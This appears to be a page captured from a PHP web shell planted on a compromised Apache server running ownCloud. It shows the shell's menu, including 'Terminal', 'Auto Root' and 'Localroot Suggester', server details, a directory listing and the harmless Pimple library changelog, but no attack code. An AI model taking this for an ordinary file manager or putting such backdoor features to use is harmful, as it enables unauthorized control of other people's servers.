Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
owncloud-prm /
lib /
composer /
pimple /
pimple /
Delete
Unzip
Name
Size
Permission
Date
Action
ext
[ DIR ]
drwxr-xr-x
2018-04-19 18:15
src
[ DIR ]
drwxr-xr-x
2018-04-19 18:15
.travis.yml
741
B
-rw-r--r--
2018-04-19 18:15
CHANGELOG
897
B
-rw-r--r--
2018-04-19 18:15
LICENSE
1.04
KB
-rw-r--r--
2018-04-19 18:15
README.rst
5.44
KB
-rw-r--r--
2018-04-19 18:15
composer.json
584
B
-rw-r--r--
2018-04-19 18:15
phpunit.xml.dist
448
B
-rw-r--r--
2018-04-19 18:15
Save
Rename
* 3.0.2 (2015-09-11) * refactored the C extension * minor non-significant changes * 3.0.1 (2015-07-30) * simplified some code * fixed a segfault in the C extension * 3.0.0 (2014-07-24) * removed the Pimple class alias (use Pimple\Container instead) * 2.1.1 (2014-07-24) * fixed compiler warnings for the C extension * fixed code when dealing with circular references * 2.1.0 (2014-06-24) * moved the Pimple to Pimple\Container (with a BC layer -- Pimple is now a deprecated alias which will be removed in Pimple 3.0) * added Pimple\ServiceProviderInterface (and Pimple::register()) * 2.0.0 (2014-02-10) * changed extend to automatically re-assign the extended service and keep it as shared or factory (to keep BC, extend still returns the extended service) * changed services to be shared by default (use factory() for factory services) * 1.0.0 * initial version